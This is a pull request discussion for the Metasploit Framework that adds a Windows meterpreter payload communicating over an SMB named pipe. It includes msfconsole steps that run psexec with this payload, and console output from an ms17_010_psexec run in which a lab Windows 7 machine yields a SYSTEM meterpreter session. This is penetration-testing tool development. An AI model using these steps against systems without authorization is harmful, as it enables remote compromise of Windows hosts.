### PR TITLE
Bind named pipe payload for Windows

### PR DESCRIPTION
**Pull request by UserExistsError**
Adds meterpreter bind_named_pipe payloads for Windows targets. Includes changes to the Rex SMB client to support peeking named pipes w/o throwing an error. Code was added for SMB echo requests which was intended for keepalive use but didn't make it into the final payload.

A PR for the corresponding changes in meterpreter are here:
https://github.com/rapid7/metasploit-payloads/pull/270

## Verification
Build meterpreter from above PR and copy binaries to metasploit-framework/data/meterpreter/

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/psexec`
- [ ] `set payload windows/x64/meterpreter/bind_named_pipe`
- [ ] `set SMBUser user`
- [ ] `set SMBPass pass`
- [ ] `set RHOST host`
- [ ] `run`

You should notice that the only new connection is to RHOST:445.

## Known Issues
The comms become flaky when interacting with channels (eg channel -i, shell). The session manager expects a TCP socket so I created a wrapper for pipes that implements what is needed. The issue seems to lie in the expectation of an actual socket. More details are available in the comments for lib/msf/core/handler/bind_named_pipe.rb

### CODE REVIEW

**Comment by sempervictus** [comment]
The named pipe abstraction to a handle should already be there from @OJs pipes work, I'll take a peek at the other side as well. Thanks a ton, more layer7 transports!

File: lib/rex/proto/smb/constants.rb [hunk 1]
```diff
@@ -1398,6 +1398,17 @@ def self.make_nbs (template)
     [ 'Payload', 'ByteCount',  nil, true ]
   )
```
Comment (busterb) [inline lib/rex/proto/smb/constants.rb]: @dmohanty-r7 / @sgonzalez-r7 this is something that needs to be added to Ruby_SMB no?

**Comment by busterb** [comment]
I built a payloads gem for testing as metasploit-payloads-1.3.29, having a little trouble getting it to fully stage against Windows 7 Ultimate SP1. Will do some debug. Thanks!

```
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started bind pipe handler
[*] 192.168.56.103:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[*] 192.168.56.103:445 - Built a write-what-where primitive...
[+] 192.168.56.103:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.56.103:445 - Selecting PowerShell target
[*] 192.168.56.103:445 - Executing the payload...
[+] 192.168.56.103:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes)

meterpreter > sysinfo
[-] Unknown command: sysinfo.
```

**Comment by UserExistsError** [comment]
I think your result is related to the issue with "channel -i" and multiple threads attempting to write over the pipe. If you wait a few seconds (after meterpreter is finished loading modules) it should work reliably.

**Comment by busterb** [comment]
Yep, it's a little pokey. Running standalone worked fine. I think we can continue to develop in-tree.

```
msf5 exploit(multi/handler) > run

[*] Started bind pipe handler
[*] Sending stage (206403 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:62625 -> 192.168.56.103:445) at 2018-02-15 17:16:45 -0600

meterpreter > sysinfo
Computer        : WINDOWS7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
```

**Comment by busterb** [comment]
## Release Notes

This adds initial support for the bind_named_pipe transport type to 64-bit Windows Meterpreter. This allows Metasploit to connect directly to a Meterpreter payload over an SMB named pipe.

**Comment by mubix** [comment]
THank you @UserExistsError / @busterb - This is so awesome!

**Pull request merged**